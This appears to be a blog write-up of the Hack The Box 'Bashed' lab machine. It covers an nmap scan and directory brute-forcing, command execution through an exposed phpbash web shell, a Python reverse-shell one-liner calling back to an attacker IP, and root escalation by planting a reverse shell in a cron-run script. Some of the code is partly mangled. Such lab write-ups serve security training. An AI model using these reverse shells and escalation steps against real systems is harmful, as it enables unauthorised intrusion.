Bashed Write-Up



Using the lazy script *-A* (for all scripts) we discover an open port at 80, running Apache 2.4.18 (UBUNTU).

# nmap -A                        
Starting Nmap 7.91 ( ) at 2021-04-08 03:14 EDT
Nmap scan report for
Host is up (0.050s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:
Let’s see what’s this website is about.

Dirbuster report

Of course, running a directory bruteforce is the next logical thing to do. It reveals bunch of directories and files that are interesting:

DirBuster 1.0-RC1 - Report
Report produced on Thu Apr 08 03:25:09 EDT 2021
Directories found during testing:
Dirs found with a 200 response:
Dirs found with a 403 response:
Files found during testing:
Files found with a 200 responce:

The developer boasted about a phpbash file which he created onto the platform. Let’s see how we can use it to our advantage.

Burp Suite

I am going to try and see the contents of the file of interest.


The file runs bash commands on the local host. Let’s cat our first flag 🙂

POST /dev/phpbash.min.php/ HTTP/1.1
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

cmd=cd /home/arrexel;pwd;ls;cat user.txt;


HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 08:02:27 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 56
Connection: close
Content-Type: text/html; charset=UTF-8


Let’s see how we can escalate our privileges and gain root.

Firstly, let’s get reverse shell:

  1. change attacking IP:PORT
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'


Let’s upgrade our shell, so that we could make it more usable:

  1. Spawn better shell: python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
  2. Get access to term commands: export TERM=xterm
  3. Background the shell with CNTRL + Z and turn on autocomplete etc. by typing in original terminal: stty raw -echo; fg

Privelege Escalation

  • Ran locally but nothing really was of interest.
  • Looked for SGID/SUID files.
  • finally looked into sudoers and received the following output:
$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

It seems we (www-data) could run commands as user scriptmanager since it does not require password.

$ sudo -u scriptmanager whoami

To become user scriptmanager we type in:

sudo -u scriptmanager /bin/bash -i 

Let’s enumerate further. What does this user owns or has access to?

[email protected]:/$ find / -type f -user scriptmanager 2>/dev/null

It appears it owns something within /scripts/

[email protected]:/scripts$ cat
f = open("test.txt", "w")
f.write("testing 123!")

It opens test.txt and writes a string into it, hmm. Who owns test.txt?

[email protected]:/scripts$ ll
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr  8 03:19 ./
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ../
-rw-r--r--  1 scriptmanager scriptmanager  282 Apr  8 03:19
-rw-r--r--  1 root          root            12 Apr  8 03:03 test.txt

So, if it is executed by cron, runs as root since it opens test.txt? Or, perhaps the scheduler runs everything as root in the folder. Let’s add sauce: python reverse shell

[email protected]:/scripts$ cat
import socket,subprocess,os
s.connect(("",5555)) //change this

Results in reverse shell

# nc -lnvp 5555
listening on \[any\] 1337 ...  
connect to \[\] from (UNKNOWN) \[\] 50176  
/bin/sh: 0: can’t access tty; job control turned off  
# whoami  
# cat /root/root.txt  

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: